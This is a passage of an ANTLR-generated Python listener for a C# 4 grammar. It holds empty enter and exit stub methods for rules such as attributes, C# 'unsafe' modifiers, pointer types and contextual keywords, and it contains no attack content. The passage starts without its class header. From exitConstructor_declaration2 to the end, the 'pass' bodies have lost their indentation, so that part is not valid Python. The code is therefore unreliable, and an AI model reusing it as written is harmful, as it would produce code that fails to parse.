def exitAttribute_sections(self, ctx: CSharp4Parser.Attribute_sectionsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_section.
def enterAttribute_section(self, ctx: CSharp4Parser.Attribute_sectionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_section.
def exitAttribute_section(self, ctx: CSharp4Parser.Attribute_sectionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_target_specifier.
def enterAttribute_target_specifier(self, ctx: CSharp4Parser.Attribute_target_specifierContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_target_specifier.
def exitAttribute_target_specifier(self, ctx: CSharp4Parser.Attribute_target_specifierContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_target.
def enterAttribute_target(self, ctx: CSharp4Parser.Attribute_targetContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_target.
def exitAttribute_target(self, ctx: CSharp4Parser.Attribute_targetContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_list.
def enterAttribute_list(self, ctx: CSharp4Parser.Attribute_listContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_list.
def exitAttribute_list(self, ctx: CSharp4Parser.Attribute_listContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute.
def enterAttribute(self, ctx: CSharp4Parser.AttributeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute.
def exitAttribute(self, ctx: CSharp4Parser.AttributeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_name.
def enterAttribute_name(self, ctx: CSharp4Parser.Attribute_nameContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_name.
def exitAttribute_name(self, ctx: CSharp4Parser.Attribute_nameContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_arguments.
def enterAttribute_arguments(self, ctx: CSharp4Parser.Attribute_argumentsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_arguments.
def exitAttribute_arguments(self, ctx: CSharp4Parser.Attribute_argumentsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#positional_argument_list.
def enterPositional_argument_list(self, ctx: CSharp4Parser.Positional_argument_listContext):
    pass
# Exit a parse tree produced by CSharp4Parser#positional_argument_list.
def exitPositional_argument_list(self, ctx: CSharp4Parser.Positional_argument_listContext):
    pass
# Enter a parse tree produced by CSharp4Parser#positional_argument.
def enterPositional_argument(self, ctx: CSharp4Parser.Positional_argumentContext):
    pass
# Exit a parse tree produced by CSharp4Parser#positional_argument.
def exitPositional_argument(self, ctx: CSharp4Parser.Positional_argumentContext):
    pass
# Enter a parse tree produced by CSharp4Parser#named_argument_list.
def enterNamed_argument_list(self, ctx: CSharp4Parser.Named_argument_listContext):
    pass
# Exit a parse tree produced by CSharp4Parser#named_argument_list.
def exitNamed_argument_list(self, ctx: CSharp4Parser.Named_argument_listContext):
    pass
# Enter a parse tree produced by CSharp4Parser#named_argument.
def enterNamed_argument(self, ctx: CSharp4Parser.Named_argumentContext):
    pass
# Exit a parse tree produced by CSharp4Parser#named_argument.
def exitNamed_argument(self, ctx: CSharp4Parser.Named_argumentContext):
    pass
# Enter a parse tree produced by CSharp4Parser#attribute_argument_expression.
def enterAttribute_argument_expression(self, ctx: CSharp4Parser.Attribute_argument_expressionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#attribute_argument_expression.
def exitAttribute_argument_expression(self, ctx: CSharp4Parser.Attribute_argument_expressionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def enterClass_modifier_unsafe(self, ctx: CSharp4Parser.Class_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def exitClass_modifier_unsafe(self, ctx: CSharp4Parser.Class_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def enterStruct_modifier_unsafe(self, ctx: CSharp4Parser.Struct_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def exitStruct_modifier_unsafe(self, ctx: CSharp4Parser.Struct_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def enterInterface_modifier_unsafe(self, ctx: CSharp4Parser.Interface_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def exitInterface_modifier_unsafe(self, ctx: CSharp4Parser.Interface_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def enterDelegate_modifier_unsafe(self, ctx: CSharp4Parser.Delegate_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def exitDelegate_modifier_unsafe(self, ctx: CSharp4Parser.Delegate_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def enterField_modifier_unsafe(self, ctx: CSharp4Parser.Field_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def exitField_modifier_unsafe(self, ctx: CSharp4Parser.Field_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def enterMethod_modifier_unsafe(self, ctx: CSharp4Parser.Method_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def exitMethod_modifier_unsafe(self, ctx: CSharp4Parser.Method_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def enterProperty_modifier_unsafe(self, ctx: CSharp4Parser.Property_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def exitProperty_modifier_unsafe(self, ctx: CSharp4Parser.Property_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def enterEvent_modifier_unsafe(self, ctx: CSharp4Parser.Event_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def exitEvent_modifier_unsafe(self, ctx: CSharp4Parser.Event_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def enterIndexer_modifier_unsafe(self, ctx: CSharp4Parser.Indexer_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def exitIndexer_modifier_unsafe(self, ctx: CSharp4Parser.Indexer_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def enterOperator_modifier_unsafe(self, ctx: CSharp4Parser.Operator_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def exitOperator_modifier_unsafe(self, ctx: CSharp4Parser.Operator_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def enterConstructor_modifier_unsafe(self, ctx: CSharp4Parser.Constructor_modifier_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def exitConstructor_modifier_unsafe(self, ctx: CSharp4Parser.Constructor_modifier_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def enterDestructor_declaration_unsafe(self, ctx: CSharp4Parser.Destructor_declaration_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def exitDestructor_declaration_unsafe(self, ctx: CSharp4Parser.Destructor_declaration_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def enterStatic_constructor_modifiers_unsafe(self, ctx: CSharp4Parser.Static_constructor_modifiers_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def exitStatic_constructor_modifiers_unsafe(self, ctx: CSharp4Parser.Static_constructor_modifiers_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def enterEmbedded_statement_unsafe(self, ctx: CSharp4Parser.Embedded_statement_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def exitEmbedded_statement_unsafe(self, ctx: CSharp4Parser.Embedded_statement_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#unsafe_statement.
def enterUnsafe_statement(self, ctx: CSharp4Parser.Unsafe_statementContext):
    pass
# Exit a parse tree produced by CSharp4Parser#unsafe_statement.
def exitUnsafe_statement(self, ctx: CSharp4Parser.Unsafe_statementContext):
    pass
# Enter a parse tree produced by CSharp4Parser#type_unsafe.
def enterType_unsafe(self, ctx: CSharp4Parser.Type_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#type_unsafe.
def exitType_unsafe(self, ctx: CSharp4Parser.Type_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#pointer_type.
def enterPointer_type(self, ctx: CSharp4Parser.Pointer_typeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#pointer_type.
def exitPointer_type(self, ctx: CSharp4Parser.Pointer_typeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#unmanaged_type.
def enterUnmanaged_type(self, ctx: CSharp4Parser.Unmanaged_typeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#unmanaged_type.
def exitUnmanaged_type(self, ctx: CSharp4Parser.Unmanaged_typeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def enterPrimary_no_array_creation_expression_unsafe(self, ctx: CSharp4Parser.Primary_no_array_creation_expression_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def exitPrimary_no_array_creation_expression_unsafe(self, ctx: CSharp4Parser.Primary_no_array_creation_expression_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def enterUnary_expression_unsafe(self, ctx: CSharp4Parser.Unary_expression_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def exitUnary_expression_unsafe(self, ctx: CSharp4Parser.Unary_expression_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def enterPointer_indirection_expression(self, ctx: CSharp4Parser.Pointer_indirection_expressionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def exitPointer_indirection_expression(self, ctx: CSharp4Parser.Pointer_indirection_expressionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#addressof_expression.
def enterAddressof_expression(self, ctx: CSharp4Parser.Addressof_expressionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#addressof_expression.
def exitAddressof_expression(self, ctx: CSharp4Parser.Addressof_expressionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#sizeof_expression.
def enterSizeof_expression(self, ctx: CSharp4Parser.Sizeof_expressionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#sizeof_expression.
def exitSizeof_expression(self, ctx: CSharp4Parser.Sizeof_expressionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_statement.
def enterFixed_statement(self, ctx: CSharp4Parser.Fixed_statementContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_statement.
def exitFixed_statement(self, ctx: CSharp4Parser.Fixed_statementContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def enterFixed_pointer_declarators(self, ctx: CSharp4Parser.Fixed_pointer_declaratorsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def exitFixed_pointer_declarators(self, ctx: CSharp4Parser.Fixed_pointer_declaratorsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def enterFixed_pointer_declarator(self, ctx: CSharp4Parser.Fixed_pointer_declaratorContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def exitFixed_pointer_declarator(self, ctx: CSharp4Parser.Fixed_pointer_declaratorContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def enterFixed_pointer_initializer(self, ctx: CSharp4Parser.Fixed_pointer_initializerContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def exitFixed_pointer_initializer(self, ctx: CSharp4Parser.Fixed_pointer_initializerContext):
    pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def enterStruct_member_declaration_unsafe(self, ctx: CSharp4Parser.Struct_member_declaration_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def exitStruct_member_declaration_unsafe(self, ctx: CSharp4Parser.Struct_member_declaration_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def enterFixed_size_buffer_declaration(self, ctx: CSharp4Parser.Fixed_size_buffer_declarationContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def exitFixed_size_buffer_declaration(self, ctx: CSharp4Parser.Fixed_size_buffer_declarationContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def enterFixed_size_buffer_modifiers(self, ctx: CSharp4Parser.Fixed_size_buffer_modifiersContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def exitFixed_size_buffer_modifiers(self, ctx: CSharp4Parser.Fixed_size_buffer_modifiersContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def enterFixed_size_buffer_modifier(self, ctx: CSharp4Parser.Fixed_size_buffer_modifierContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def exitFixed_size_buffer_modifier(self, ctx: CSharp4Parser.Fixed_size_buffer_modifierContext):
    pass
# Enter a parse tree produced by CSharp4Parser#buffer_element_type.
def enterBuffer_element_type(self, ctx: CSharp4Parser.Buffer_element_typeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#buffer_element_type.
def exitBuffer_element_type(self, ctx: CSharp4Parser.Buffer_element_typeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def enterFixed_size_buffer_declarators(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorsContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def exitFixed_size_buffer_declarators(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorsContext):
    pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def enterFixed_size_buffer_declarator(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorContext):
    pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def exitFixed_size_buffer_declarator(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorContext):
    pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def enterLocal_variable_initializer_unsafe(self, ctx: CSharp4Parser.Local_variable_initializer_unsafeContext):
    pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def exitLocal_variable_initializer_unsafe(self, ctx: CSharp4Parser.Local_variable_initializer_unsafeContext):
    pass
# Enter a parse tree produced by CSharp4Parser#stackalloc_initializer.
def enterStackalloc_initializer(self, ctx: CSharp4Parser.Stackalloc_initializerContext):
    pass
# Exit a parse tree produced by CSharp4Parser#stackalloc_initializer.
def exitStackalloc_initializer(self, ctx: CSharp4Parser.Stackalloc_initializerContext):
    pass
# Enter a parse tree produced by CSharp4Parser#from_contextual_keyword.
def enterFrom_contextual_keyword(self, ctx: CSharp4Parser.From_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#from_contextual_keyword.
def exitFrom_contextual_keyword(self, ctx: CSharp4Parser.From_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#let_contextual_keyword.
def enterLet_contextual_keyword(self, ctx: CSharp4Parser.Let_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#let_contextual_keyword.
def exitLet_contextual_keyword(self, ctx: CSharp4Parser.Let_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#where_contextual_keyword.
def enterWhere_contextual_keyword(self, ctx: CSharp4Parser.Where_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#where_contextual_keyword.
def exitWhere_contextual_keyword(self, ctx: CSharp4Parser.Where_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#join_contextual_keyword.
def enterJoin_contextual_keyword(self, ctx: CSharp4Parser.Join_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#join_contextual_keyword.
def exitJoin_contextual_keyword(self, ctx: CSharp4Parser.Join_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#on_contextual_keyword.
def enterOn_contextual_keyword(self, ctx: CSharp4Parser.On_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#on_contextual_keyword.
def exitOn_contextual_keyword(self, ctx: CSharp4Parser.On_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def enterEquals_contextual_keyword(self, ctx: CSharp4Parser.Equals_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def exitEquals_contextual_keyword(self, ctx: CSharp4Parser.Equals_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#into_contextual_keyword.
def enterInto_contextual_keyword(self, ctx: CSharp4Parser.Into_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#into_contextual_keyword.
def exitInto_contextual_keyword(self, ctx: CSharp4Parser.Into_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def enterOrderby_contextual_keyword(self, ctx: CSharp4Parser.Orderby_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def exitOrderby_contextual_keyword(self, ctx: CSharp4Parser.Orderby_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def enterAscending_contextual_keyword(self, ctx: CSharp4Parser.Ascending_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def exitAscending_contextual_keyword(self, ctx: CSharp4Parser.Ascending_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def enterDescending_contextual_keyword(self, ctx: CSharp4Parser.Descending_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def exitDescending_contextual_keyword(self, ctx: CSharp4Parser.Descending_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#select_contextual_keyword.
def enterSelect_contextual_keyword(self, ctx: CSharp4Parser.Select_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#select_contextual_keyword.
def exitSelect_contextual_keyword(self, ctx: CSharp4Parser.Select_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#group_contextual_keyword.
def enterGroup_contextual_keyword(self, ctx: CSharp4Parser.Group_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#group_contextual_keyword.
def exitGroup_contextual_keyword(self, ctx: CSharp4Parser.Group_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#by_contextual_keyword.
def enterBy_contextual_keyword(self, ctx: CSharp4Parser.By_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#by_contextual_keyword.
def exitBy_contextual_keyword(self, ctx: CSharp4Parser.By_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def enterPartial_contextual_keyword(self, ctx: CSharp4Parser.Partial_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def exitPartial_contextual_keyword(self, ctx: CSharp4Parser.Partial_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def enterAlias_contextual_keyword(self, ctx: CSharp4Parser.Alias_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def exitAlias_contextual_keyword(self, ctx: CSharp4Parser.Alias_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def enterYield_contextual_keyword(self, ctx: CSharp4Parser.Yield_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def exitYield_contextual_keyword(self, ctx: CSharp4Parser.Yield_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#get_contextual_keyword.
def enterGet_contextual_keyword(self, ctx: CSharp4Parser.Get_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#get_contextual_keyword.
def exitGet_contextual_keyword(self, ctx: CSharp4Parser.Get_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#set_contextual_keyword.
def enterSet_contextual_keyword(self, ctx: CSharp4Parser.Set_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#set_contextual_keyword.
def exitSet_contextual_keyword(self, ctx: CSharp4Parser.Set_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#add_contextual_keyword.
def enterAdd_contextual_keyword(self, ctx: CSharp4Parser.Add_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#add_contextual_keyword.
def exitAdd_contextual_keyword(self, ctx: CSharp4Parser.Add_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def enterRemove_contextual_keyword(self, ctx: CSharp4Parser.Remove_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def exitRemove_contextual_keyword(self, ctx: CSharp4Parser.Remove_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def enterDynamic_contextual_keyword(self, ctx: CSharp4Parser.Dynamic_contextual_keywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def exitDynamic_contextual_keyword(self, ctx: CSharp4Parser.Dynamic_contextual_keywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#arglist.
def enterArglist(self, ctx: CSharp4Parser.ArglistContext):
    pass
# Exit a parse tree produced by CSharp4Parser#arglist.
def exitArglist(self, ctx: CSharp4Parser.ArglistContext):
    pass
# Enter a parse tree produced by CSharp4Parser#right_arrow.
def enterRight_arrow(self, ctx: CSharp4Parser.Right_arrowContext):
    pass
# Exit a parse tree produced by CSharp4Parser#right_arrow.
def exitRight_arrow(self, ctx: CSharp4Parser.Right_arrowContext):
    pass
# Enter a parse tree produced by CSharp4Parser#right_shift.
def enterRight_shift(self, ctx: CSharp4Parser.Right_shiftContext):
    pass
# Exit a parse tree produced by CSharp4Parser#right_shift.
def exitRight_shift(self, ctx: CSharp4Parser.Right_shiftContext):
    pass
# Enter a parse tree produced by CSharp4Parser#right_shift_assignment.
def enterRight_shift_assignment(self, ctx: CSharp4Parser.Right_shift_assignmentContext):
    pass
# Exit a parse tree produced by CSharp4Parser#right_shift_assignment.
def exitRight_shift_assignment(self, ctx: CSharp4Parser.Right_shift_assignmentContext):
    pass
# Enter a parse tree produced by CSharp4Parser#literal.
def enterLiteral(self, ctx: CSharp4Parser.LiteralContext):
    pass
# Exit a parse tree produced by CSharp4Parser#literal.
def exitLiteral(self, ctx: CSharp4Parser.LiteralContext):
    pass
# Enter a parse tree produced by CSharp4Parser#boolean_literal.
def enterBoolean_literal(self, ctx: CSharp4Parser.Boolean_literalContext):
    pass
# Exit a parse tree produced by CSharp4Parser#boolean_literal.
def exitBoolean_literal(self, ctx: CSharp4Parser.Boolean_literalContext):
    pass
# Enter a parse tree produced by CSharp4Parser#keyword.
def enterKeyword(self, ctx: CSharp4Parser.KeywordContext):
    pass
# Exit a parse tree produced by CSharp4Parser#keyword.
def exitKeyword(self, ctx: CSharp4Parser.KeywordContext):
    pass
# Enter a parse tree produced by CSharp4Parser#class_definition.
def enterClass_definition(self, ctx: CSharp4Parser.Class_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#class_definition.
def exitClass_definition(self, ctx: CSharp4Parser.Class_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#struct_definition.
def enterStruct_definition(self, ctx: CSharp4Parser.Struct_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#struct_definition.
def exitStruct_definition(self, ctx: CSharp4Parser.Struct_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#interface_definition.
def enterInterface_definition(self, ctx: CSharp4Parser.Interface_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#interface_definition.
def exitInterface_definition(self, ctx: CSharp4Parser.Interface_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#enum_definition.
def enterEnum_definition(self, ctx: CSharp4Parser.Enum_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#enum_definition.
def exitEnum_definition(self, ctx: CSharp4Parser.Enum_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#delegate_definition.
def enterDelegate_definition(self, ctx: CSharp4Parser.Delegate_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#delegate_definition.
def exitDelegate_definition(self, ctx: CSharp4Parser.Delegate_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#event_declaration2.
def enterEvent_declaration2(self, ctx: CSharp4Parser.Event_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#event_declaration2.
def exitEvent_declaration2(self, ctx: CSharp4Parser.Event_declaration2Context):
    pass
# Enter a parse tree produced by CSharp4Parser#field_declaration2.
def enterField_declaration2(self, ctx: CSharp4Parser.Field_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#field_declaration2.
def exitField_declaration2(self, ctx: CSharp4Parser.Field_declaration2Context):
    pass
# Enter a parse tree produced by CSharp4Parser#property_declaration2.
def enterProperty_declaration2(self, ctx: CSharp4Parser.Property_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#property_declaration2.
def exitProperty_declaration2(self, ctx: CSharp4Parser.Property_declaration2Context):
    pass
# Enter a parse tree produced by CSharp4Parser#constant_declaration2.
def enterConstant_declaration2(self, ctx: CSharp4Parser.Constant_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#constant_declaration2.
def exitConstant_declaration2(self, ctx: CSharp4Parser.Constant_declaration2Context):
    pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration2.
def enterIndexer_declaration2(self, ctx: CSharp4Parser.Indexer_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration2.
def exitIndexer_declaration2(self, ctx: CSharp4Parser.Indexer_declaration2Context):
    pass
# Enter a parse tree produced by CSharp4Parser#destructor_definition.
def enterDestructor_definition(self, ctx: CSharp4Parser.Destructor_definitionContext):
    pass
# Exit a parse tree produced by CSharp4Parser#destructor_definition.
def exitDestructor_definition(self, ctx: CSharp4Parser.Destructor_definitionContext):
    pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration2.
def enterConstructor_declaration2(self, ctx: CSharp4Parser.Constructor_declaration2Context):
    pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration2.
def exitConstructor_declaration2(self, ctx: CSharp4Parser.Constructor_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration2.
def enterMethod_declaration2(self, ctx: CSharp4Parser.Method_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration2.
def exitMethod_declaration2(self, ctx: CSharp4Parser.Method_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name.
def enterMethod_member_name(self, ctx: CSharp4Parser.Method_member_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name.
def exitMethod_member_name(self, ctx: CSharp4Parser.Method_member_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name2.
def enterMethod_member_name2(self, ctx: CSharp4Parser.Method_member_name2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name2.
def exitMethod_member_name2(self, ctx: CSharp4Parser.Method_member_name2Context):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration2.
def enterOperator_declaration2(self, ctx: CSharp4Parser.Operator_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration2.
def exitOperator_declaration2(self, ctx: CSharp4Parser.Operator_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration2.
def enterInterface_method_declaration2(self, ctx: CSharp4Parser.Interface_method_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration2.
def exitInterface_method_declaration2(self, ctx: CSharp4Parser.Interface_method_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration2.
def enterInterface_property_declaration2(self, ctx: CSharp4Parser.Interface_property_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration2.
def exitInterface_property_declaration2(self, ctx: CSharp4Parser.Interface_property_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration2.
def enterInterface_event_declaration2(self, ctx: CSharp4Parser.Interface_event_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration2.
def exitInterface_event_declaration2(self, ctx: CSharp4Parser.Interface_event_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def enterInterface_indexer_declaration2(self, ctx: CSharp4Parser.Interface_indexer_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def exitInterface_indexer_declaration2(self, ctx: CSharp4Parser.Interface_indexer_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#member_access2.
